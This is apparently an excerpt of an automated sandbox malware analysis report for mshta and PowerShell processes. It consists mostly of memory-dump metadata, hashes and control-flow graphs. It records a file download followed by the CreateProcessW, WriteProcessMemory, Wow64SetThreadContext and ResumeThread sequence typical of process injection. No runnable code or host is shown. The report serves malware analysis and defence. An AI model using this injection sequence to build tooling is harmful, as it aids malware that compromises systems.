                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                                                      • Instruction ID: 4f36ca7eb5c8e0b643252b114b1545ac3f6212172aa1456c1bd5710681ec9a9d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                                                                                      Function 02B30FB9 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000003.436584026.0000000002B30000.00000010.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_3_2b30000_mshta.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                                                      • Instruction ID: 4f36ca7eb5c8e0b643252b114b1545ac3f6212172aa1456c1bd5710681ec9a9d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                                                                                      Function 02B30FC1 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000003.436584026.0000000002B30000.00000010.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_3_2b30000_mshta.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                                                      • Instruction ID: 4f36ca7eb5c8e0b643252b114b1545ac3f6212172aa1456c1bd5710681ec9a9d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                                                      • Instruction Fuzzy Hash:

                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                      Execution Coverage:3.9%
                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                                      Total number of Nodes:3
                                                                                                                                                                                                                      Total number of Limit Nodes:0
                                                                                                                                                                                                                      execution_graph 3846 7fe89957ae1 3847 7fe89957af1 URLDownloadToFileW 3846->3847 3849 7fe89957c00 3847->3849

                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                      Function 000007FE89957018 Relevance: 1.6, APIs: 1, Instructions: 129filenetworkCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 101 7fe89957018-7fe89957ba1 105 7fe89957ba3-7fe89957ba8 101->105 106 7fe89957bab-7fe89957bb1 101->106 105->106 107 7fe89957bb3-7fe89957bb8 106->107 108 7fe89957bbb-7fe89957bfe URLDownloadToFileW 106->108 107->108 109 7fe89957c00 108->109 110 7fe89957c06-7fe89957c23 108->110 109->110
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.459211883.000007FE89950000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89950000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7fe89950000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: DownloadFile
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1407266417-0
                                                                                                                                                                                                                      • Opcode ID: ad102f671b387c8bdb9eccb270edfe768abafc60277576bb303147bf56b224b4
                                                                                                                                                                                                                      • Instruction ID: 95bd0619ac69998a781a7aa69bc74f58fb9eba3f05624c16dcc8306718fa93a4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad102f671b387c8bdb9eccb270edfe768abafc60277576bb303147bf56b224b4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5319131918A5C9FDB58EF9CD8857A9B7E1FB59321F00822ED04DD3661CB70B9058B81
                                                                                                                                                                                                                      Function 000007FE89A2380A Relevance: 2.8, Strings: 2, Instructions: 276COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.459293751.000007FE89A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A20000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7fe89a20000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 88E$XhL
                                                                                                                                                                                                                      • API String ID: 0-745517462
                                                                                                                                                                                                                      • Opcode ID: 94824be57cb7f488fdf6d7ac484959099b864282760d69c31e465bab8ac4870b
                                                                                                                                                                                                                      • Instruction ID: b6a511e6e5ecba9464be4dcd289b2df9d16111bc90985e4a21c15a60905a25df
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94824be57cb7f488fdf6d7ac484959099b864282760d69c31e465bab8ac4870b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7881102190E7D60FE75393B858246A57FF1DF97650B0E01EBC489CB1B3D909AC0AC362
                                                                                                                                                                                                                      Function 000007FE89A2566D Relevance: 1.7, Strings: 1, Instructions: 456COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 28 7fe89a2566d-7fe89a25677 29 7fe89a2567e-7fe89a2568f 28->29 30 7fe89a25679 28->30 32 7fe89a25691 29->32 33 7fe89a25696-7fe89a256a7 29->33 30->29 31 7fe89a2567b 30->31 31->29 32->33 34 7fe89a25693 32->34 35 7fe89a256ae-7fe89a256bf 33->35 36 7fe89a256a9 33->36 34->33 38 7fe89a256c1 35->38 39 7fe89a256c6-7fe89a256d7 35->39 36->35 37 7fe89a256ab 36->37 37->35 38->39 40 7fe89a256c3 38->40 41 7fe89a256de-7fe89a25720 39->41 42 7fe89a256d9 39->42 40->39 44 7fe89a25722-7fe89a25749 41->44 45 7fe89a25778-7fe89a2579a 41->45 42->41 43 7fe89a256db 42->43 43->41 48 7fe89a257a8-7fe89a257aa 44->48 49 7fe89a2574b-7fe89a25777 44->49 46 7fe89a257a0-7fe89a257a7 45->46 47 7fe89a25903-7fe89a259cc 45->47 46->48 50 7fe89a257c3-7fe89a257c8 48->50 51 7fe89a257ac-7fe89a257b9 48->51 49->45 53 7fe89a257ce-7fe89a257d1 50->53 54 7fe89a258a3-7fe89a258ad 50->54 51->50 52 7fe89a257bb-7fe89a257c1 51->52 52->50 58 7fe89a257d3-7fe89a257e2 53->58 59 7fe89a25816 53->59 56 7fe89a258af-7fe89a258bd 54->56 57 7fe89a258be-7fe89a258ce 54->57 60 7fe89a258d0-7fe89a258d4 57->60 61 7fe89a258db-7fe89a25900 57->61 58->47 70 7fe89a257e8-7fe89a257f2 58->70 62 7fe89a25818-7fe89a2581a 59->62 60->61 61->47 62->54 65 7fe89a25820-7fe89a25826 62->65 67 7fe89a25842-7fe89a25884 65->67 68 7fe89a25828-7fe89a25835 65->68 83 7fe89a2588a-7fe89a258a2 67->83 68->67 72 7fe89a25837-7fe89a25840 68->72 73 7fe89a257f4-7fe89a25801 70->73 74 7fe89a2580b-7fe89a25814 70->74 72->67 73->74 77 7fe89a25803-7fe89a25809 73->77 74->62 77->74
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.459293751.000007FE89A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A20000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7fe89a20000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: V
                                                                                                                                                                                                                      • API String ID: 0-1342839628
                                                                                                                                                                                                                      • Opcode ID: acead22ee7a58f46e2dad43e27571325ee0a1e98a0437a5df0c64e66761ec7f8
                                                                                                                                                                                                                      • Instruction ID: bb48dba18660a8a7534886b193e933e4d347b244f4c669b8f50cbb4490215f33
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: acead22ee7a58f46e2dad43e27571325ee0a1e98a0437a5df0c64e66761ec7f8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2D1033080E7C91FD35797785C146AA7FA4EF47260F0911EBD48DCB0A3D619A95AC3A2
                                                                                                                                                                                                                      Function 000007FE89957AE1 Relevance: 1.7, APIs: 1, Instructions: 159filenetworkCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.459211883.000007FE89950000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89950000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7fe89950000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: DownloadFile
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1407266417-0
                                                                                                                                                                                                                      • Opcode ID: 42e23f3c00eae9c535f4e8da4675f0b03c426fa5b78777b7137bb74090def025
                                                                                                                                                                                                                      • Instruction ID: a69c517d1d6a02b0e2b217f7f1ac54f2b5ef8ff93ab3c23d3cfaab9572b0517f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 42e23f3c00eae9c535f4e8da4675f0b03c426fa5b78777b7137bb74090def025
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE41F67090CB889FDB16DB989C447AABBF4FB56321F04826FD08DD3562CB646906C781
                                                                                                                                                                                                                      Function 000007FE89A28499 Relevance: .8, Instructions: 783COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 112 7fe89a28499-7fe89a284d9 113 7fe89a28538-7fe89a28540 112->113 114 7fe89a284db-7fe89a28515 112->114 118 7fe89a28542-7fe89a28547 113->118 119 7fe89a2854a-7fe89a28589 113->119 115 7fe89a28529-7fe89a28537 114->115 116 7fe89a28517-7fe89a28522 114->116 115->113 116->115 120 7fe89a285e8-7fe89a285f9 119->120 121 7fe89a2858b-7fe89a285e7 119->121 122 7fe89a285ff-7fe89a28609 120->122 123 7fe89a28add-7fe89a28b96 120->123 121->120 124 7fe89a28622-7fe89a28629 122->124 125 7fe89a2860b-7fe89a28618 122->125 127 7fe89a28640 124->127 128 7fe89a2862b-7fe89a2863e 124->128 125->124 126 7fe89a2861a-7fe89a28620 125->126 126->124 130 7fe89a28642-7fe89a28644 127->130 128->130 133 7fe89a28a58-7fe89a28a62 130->133 134 7fe89a2864a-7fe89a28656 130->134 135 7fe89a28a75-7fe89a28a85 133->135 136 7fe89a28a64-7fe89a28a74 133->136 134->123 137 7fe89a2865c-7fe89a28666 134->137 139 7fe89a28a92-7fe89a28adc 135->139 140 7fe89a28a87-7fe89a28a8b 135->140 141 7fe89a28682-7fe89a28692 137->141 142 7fe89a28668-7fe89a28675 137->142 140->139 141->133 147 7fe89a28698-7fe89a286cc 141->147 142->141 143 7fe89a28677-7fe89a28680 142->143 143->141 147->133 153 7fe89a286d2-7fe89a286de 147->153 153->123 154 7fe89a286e4-7fe89a286ee 153->154 155 7fe89a286f0-7fe89a286fd 154->155 156 7fe89a28707-7fe89a2870c 154->156 155->156 157 7fe89a286ff-7fe89a28705 155->157 156->133 158 7fe89a28712-7fe89a28717 156->158 157->156 158->133 159 7fe89a2871d-7fe89a28722 158->159 159->133 160 7fe89a28728-7fe89a28737 159->160 162 7fe89a28739-7fe89a28743 160->162 163 7fe89a28747 160->163 164 7fe89a28745 162->164 165 7fe89a28763-7fe89a287ee 162->165 166 7fe89a2874c-7fe89a28759 163->166 164->166 173 7fe89a287f0-7fe89a287fb 165->173 174 7fe89a28802-7fe89a28824 165->174 166->165 167 7fe89a2875b-7fe89a28761 166->167 167->165 173->174 175 7fe89a28834 174->175 176 7fe89a28826-7fe89a28830 174->176 179 7fe89a28839-7fe89a28846 175->179 177 7fe89a28850-7fe89a288de 176->177 178 7fe89a28832 176->178 186 7fe89a288e0-7fe89a288eb 177->186 187 7fe89a288f2-7fe89a28910 177->187 178->179 179->177 180 7fe89a28848-7fe89a2884e 179->180 180->177 186->187 188 7fe89a28920 187->188 189 7fe89a28912-7fe89a2891c 187->189 192 7fe89a28925-7fe89a28933 188->192 190 7fe89a2891e 189->190 191 7fe89a2893d-7fe89a289cd 189->191 190->192 199 7fe89a289e1-7fe89a28a1a 191->199 200 7fe89a289cf-7fe89a289da 191->200 192->191 193 7fe89a28935-7fe89a2893b 192->193 193->191 202 7fe89a28a21-7fe89a28a3a 199->202 200->199 203 7fe89a28a42-7fe89a28a57 202->203
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.459293751.000007FE89A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A20000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7fe89a20000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 80e125d1f0bdd3838f4fd96568f2d256f7b8e1d678ae7cd5a5a2db0573f5d8e6
                                                                                                                                                                                                                      • Instruction ID: e6646b24ea0638f4fa829d39a4268bd06844e2bc46bef1f149a3d945c697aa66
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80e125d1f0bdd3838f4fd96568f2d256f7b8e1d678ae7cd5a5a2db0573f5d8e6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3332E43090CB894FD75ADB2C84546697FE2FF9A344F2900EED48EC72A3DA25AC56C741
                                                                                                                                                                                                                      Function 000007FE89A28549 Relevance: .5, Instructions: 549COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 204 7fe89a28549-7fe89a28589 205 7fe89a285e8-7fe89a285f9 204->205 206 7fe89a2858b-7fe89a285e7 204->206 207 7fe89a285ff-7fe89a28609 205->207 208 7fe89a28add-7fe89a28b96 205->208 206->205 209 7fe89a28622-7fe89a28629 207->209 210 7fe89a2860b-7fe89a28618 207->210 212 7fe89a28640 209->212 213 7fe89a2862b-7fe89a2863e 209->213 210->209 211 7fe89a2861a-7fe89a28620 210->211 211->209 215 7fe89a28642-7fe89a28644 212->215 213->215 218 7fe89a28a58-7fe89a28a62 215->218 219 7fe89a2864a-7fe89a28656 215->219 220 7fe89a28a75-7fe89a28a85 218->220 221 7fe89a28a64-7fe89a28a74 218->221 219->208 222 7fe89a2865c-7fe89a28666 219->222 224 7fe89a28a92-7fe89a28adc 220->224 225 7fe89a28a87-7fe89a28a8b 220->225 226 7fe89a28682-7fe89a28692 222->226 227 7fe89a28668-7fe89a28675 222->227 225->224 226->218 232 7fe89a28698-7fe89a286cc 226->232 227->226 228 7fe89a28677-7fe89a28680 227->228 228->226 232->218 238 7fe89a286d2-7fe89a286de 232->238 238->208 239 7fe89a286e4-7fe89a286ee 238->239 240 7fe89a286f0-7fe89a286fd 239->240 241 7fe89a28707-7fe89a2870c 239->241 240->241 242 7fe89a286ff-7fe89a28705 240->242 241->218 243 7fe89a28712-7fe89a28717 241->243 242->241 243->218 244 7fe89a2871d-7fe89a28722 243->244 244->218 245 7fe89a28728-7fe89a28737 244->245 247 7fe89a28739-7fe89a28743 245->247 248 7fe89a28747 245->248 249 7fe89a28745 247->249 250 7fe89a28763-7fe89a287ee 247->250 251 7fe89a2874c-7fe89a28759 248->251 249->251 258 7fe89a287f0-7fe89a287fb 250->258 259 7fe89a28802-7fe89a28824 250->259 251->250 252 7fe89a2875b-7fe89a28761 251->252 252->250 258->259 260 7fe89a28834 259->260 261 7fe89a28826-7fe89a28830 259->261 264 7fe89a28839-7fe89a28846 260->264 262 7fe89a28850-7fe89a288de 261->262 263 7fe89a28832 261->263 271 7fe89a288e0-7fe89a288eb 262->271 272 7fe89a288f2-7fe89a28910 262->272 263->264 264->262 265 7fe89a28848-7fe89a2884e 264->265 265->262 271->272 273 7fe89a28920 272->273 274 7fe89a28912-7fe89a2891c 272->274 277 7fe89a28925-7fe89a28933 273->277 275 7fe89a2891e 274->275 276 7fe89a2893d-7fe89a289cd 274->276 275->277 284 7fe89a289e1-7fe89a28a3a 276->284 285 7fe89a289cf-7fe89a289da 276->285 277->276 278 7fe89a28935-7fe89a2893b 277->278 278->276 288 7fe89a28a42-7fe89a28a57 284->288 285->284
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.459293751.000007FE89A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A20000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7fe89a20000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 964f9b0c25404bc383c9be2691439606b282803c68477780b2d2971253328d44
                                                                                                                                                                                                                      • Instruction ID: edb316308ccf7e6dac17cc153e9592d76020b293ad85854ade5d7031fff29f90
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 964f9b0c25404bc383c9be2691439606b282803c68477780b2d2971253328d44
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9802E53090CB894FD79ADB2C84546697FE2FF9A344F2500EAD48EC72A3DA34AC56C741
                                                                                                                                                                                                                      Function 000007FE89A210D2 Relevance: .2, Instructions: 151COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 289 7fe89a210d2-7fe89a210dc 290 7fe89a210de-7fe89a210e9 289->290 291 7fe89a210ed-7fe89a21124 289->291 292 7fe89a21148-7fe89a2119e 290->292 293 7fe89a210eb 290->293 294 7fe89a211c1-7fe89a211cb 291->294 295 7fe89a2112a-7fe89a21146 291->295 305 7fe89a211a6-7fe89a211be 292->305 293->291 296 7fe89a211d8-7fe89a211e8 294->296 297 7fe89a211cd-7fe89a211d7 294->297 295->292 298 7fe89a211f5-7fe89a2121a 296->298 299 7fe89a211ea-7fe89a211ee 296->299 299->298 305->294
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.459293751.000007FE89A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A20000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7fe89a20000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 233ffbde74005b5bb47b97cd57495abaf0cfea3b51354c09dcc2de09937b00d3
                                                                                                                                                                                                                      • Instruction ID: 745cf05793ccb98fd0d10045d35cba31bae36e0526c92052c3c1c20c6a1ebf1c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 233ffbde74005b5bb47b97cd57495abaf0cfea3b51354c09dcc2de09937b00d3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8941D211B0DBCA0FE35B937C1854264BFE1EF5B255B1901EBC48EC72A3D9099C5AC3A1

                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                      Function 000007FE89A2352E Relevance: .3, Instructions: 328COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.459293751.000007FE89A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A20000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_7fe89a20000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 6196658470c5b762067465cbbba928863655f93245d9a44515c9cfe0304f755e
                                                                                                                                                                                                                      • Instruction ID: b44b3cd62537f3f38dd9b70717cd570a3d64ac2a43305b674532abbe28f0bbfd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6196658470c5b762067465cbbba928863655f93245d9a44515c9cfe0304f755e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DBA1582090EBC90FD747A7B89C142A67FF5EF4B254F1901EBD48DCB1A3D618991AC362

                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                      Execution Coverage:3.9%
                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                                      Total number of Nodes:17
                                                                                                                                                                                                                      Total number of Limit Nodes:1
                                                                                                                                                                                                                      execution_graph 5443 7fe8992d9e5 5444 7fe8992da10 ResumeThread 5443->5444 5446 7fe8992da8b 5444->5446 5447 7fe8992d824 5448 7fe8992d82d WriteProcessMemory 5447->5448 5450 7fe8992d911 5448->5450 5451 7fe8992b916 5452 7fe8992b91d 5451->5452 5455 7fe899261e8 5452->5455 5456 7fe8992d560 Wow64SetThreadContext 5455->5456 5458 7fe8992b224 5456->5458 5459 7fe8992b75a 5463 7fe899261c8 5459->5463 5461 7fe8992b697 5461->5459 5462 7fe8992b7b2 5461->5462 5464 7fe8992d220 CreateProcessW 5463->5464 5466 7fe8992d413 5464->5466 5466->5461

                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                      Function 000007FE899F0A09 Relevance: 4.9, Strings: 3, Instructions: 1173COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 0 7fe899f0a09-7fe899f0a19 1 7fe899f09a6-7fe899f09b0 0->1 2 7fe899f0a1b-7fe899f0a94 0->2 3 7fe899f0c83-7fe899f0d2d 2->3 4 7fe899f0a9a-7fe899f0aa4 2->4 38 7fe899f0d2f 3->38 39 7fe899f0d30-7fe899f0d41 3->39 5 7fe899f0aa6-7fe899f0ab3 4->5 6 7fe899f0abd-7fe899f0ac2 4->6 5->6 10 7fe899f0ab5-7fe899f0abb 5->10 7 7fe899f0c24-7fe899f0c2e 6->7 8 7fe899f0ac8-7fe899f0acb 6->8 13 7fe899f0c30-7fe899f0c3c 7->13 14 7fe899f0c3d-7fe899f0c4d 7->14 11 7fe899f0ae2 8->11 12 7fe899f0acd-7fe899f0ae0 8->12 10->6 16 7fe899f0ae4-7fe899f0ae6 11->16 12->16 18 7fe899f0c4f-7fe899f0c53 14->18 19 7fe899f0c5a-7fe899f0c80 14->19 16->7 20 7fe899f0aec-7fe899f0b23 16->20 18->19 19->3 26 7fe899f0b25-7fe899f0b45 20->26 27 7fe899f0b47 20->27 29 7fe899f0b49-7fe899f0b4b 26->29 27->29 29->7 31 7fe899f0b51-7fe899f0b54 29->31 33 7fe899f0b56-7fe899f0b69 31->33 34 7fe899f0b6b 31->34 36 7fe899f0b6d-7fe899f0b6f 33->36 34->36 36->7 40 7fe899f0b75-7fe899f0baf 36->40 38->39 41 7fe899f0d43 39->41 42 7fe899f0d44-7fe899f0dd4 39->42 55 7fe899f0bb1-7fe899f0bbe 40->55 56 7fe899f0bc8-7fe899f0bce 40->56 41->42 43 7fe899f0dda-7fe899f0de4 42->43 44 7fe899f0f0d-7fe899f0fb9 42->44 46 7fe899f0de6-7fe899f0df3 43->46 47 7fe899f0dfd-7fe899f0e02 43->47 93 7fe899f0fbb 44->93 94 7fe899f0fbc-7fe899f0fcd 44->94 46->47 48 7fe899f0df5-7fe899f0dfb 46->48 50 7fe899f0eae-7fe899f0eb8 47->50 51 7fe899f0e08-7fe899f0e0b 47->51 48->47 53 7fe899f0ec7-7fe899f0ed7 50->53 54 7fe899f0eba-7fe899f0ec6 50->54 57 7fe899f0e22 51->57 58 7fe899f0e0d-7fe899f0e20 51->58 63 7fe899f0ee4-7fe899f0f0a 53->63 64 7fe899f0ed9-7fe899f0edd 53->64 55->56 66 7fe899f0bc0-7fe899f0bc6 55->66 59 7fe899f0bd0-7fe899f0bdd 56->59 60 7fe899f0bea-7fe899f0bed 56->60 61 7fe899f0e24-7fe899f0e26 57->61 58->61 59->60 67 7fe899f0bdf-7fe899f0be8 59->67 72 7fe899f0bf4-7fe899f0bfd 60->72 61->50 68 7fe899f0e2c-7fe899f0e2f 61->68 63->44 64->63 66->56 67->60 69 7fe899f0e31-7fe899f0e54 68->69 70 7fe899f0e56 68->70 78 7fe899f0e58-7fe899f0e5a 69->78 70->78 76 7fe899f0bff-7fe899f0c0c 72->76 77 7fe899f0c16-7fe899f0c23 72->77 76->77 81 7fe899f0c0e-7fe899f0c14 76->81 78->50 82 7fe899f0e5c-7fe899f0e78 78->82 81->77 88 7fe899f0e7e-7fe899f0e87 82->88 89 7fe899f0ea0-7fe899f0ead 88->89 90 7fe899f0e89-7fe899f0e96 88->90 90->89 91 7fe899f0e98-7fe899f0e9e 90->91 91->89 93->94 96 7fe899f0fcf 94->96 97 7fe899f0fd0-7fe899f1064 94->97 96->97 99 7fe899f11c2-7fe899f126d 97->99 100 7fe899f106a-7fe899f1074 97->100 137 7fe899f126f 99->137 138 7fe899f1270-7fe899f1281 99->138 101 7fe899f1076-7fe899f1083 100->101 102 7fe899f108d-7fe899f1092 100->102 101->102 103 7fe899f1085-7fe899f108b 101->103 104 7fe899f1163-7fe899f116d 102->104 105 7fe899f1098-7fe899f109b 102->105 103->102 107 7fe899f116f-7fe899f117b 104->107 108 7fe899f117c-7fe899f118c 104->108 109 7fe899f10b2 105->109 110 7fe899f109d-7fe899f10b0 105->110 111 7fe899f118e-7fe899f1192 108->111 112 7fe899f1199-7fe899f11bf 108->112 114 7fe899f10b4-7fe899f10b6 109->114 110->114 111->112 112->99 114->104 116 7fe899f10bc-7fe899f10bf 114->116 118 7fe899f10c1-7fe899f10d4 116->118 119 7fe899f10d6 116->119 121 7fe899f10d8-7fe899f10da 118->121 119->121 121->104 122 7fe899f10e0-7fe899f10e6 121->122 124 7fe899f1102-7fe899f1108 122->124 125 7fe899f10e8-7fe899f10f5 122->125 128 7fe899f1124-7fe899f1162 124->128 129 7fe899f110a-7fe899f1117 124->129 125->124 126 7fe899f10f7-7fe899f1100 125->126 126->124 129->128 130 7fe899f1119-7fe899f1122 129->130 130->128 137->138 139 7fe899f1283 138->139 140 7fe899f1284-7fe899f1291 138->140 139->140 141 7fe899f1293-7fe899f12aa 140->141 142 7fe899f12ab-7fe899f1303 140->142 141->142 143 7fe899f137f-7fe899f1389 142->143 144 7fe899f1305-7fe899f131a 142->144 145 7fe899f1395-7fe899f13a5 143->145 146 7fe899f138b-7fe899f1394 143->146 144->143 147 7fe899f131c-7fe899f1329 144->147 148 7fe899f13b2-7fe899f13d5 145->148 149 7fe899f13a7-7fe899f13ab 145->149 150 7fe899f132b-7fe899f1336 147->150 151 7fe899f133d-7fe899f137c 147->151 149->148 150->151 151->143
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.548548452.000007FE899F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899F0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7fe899f0000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
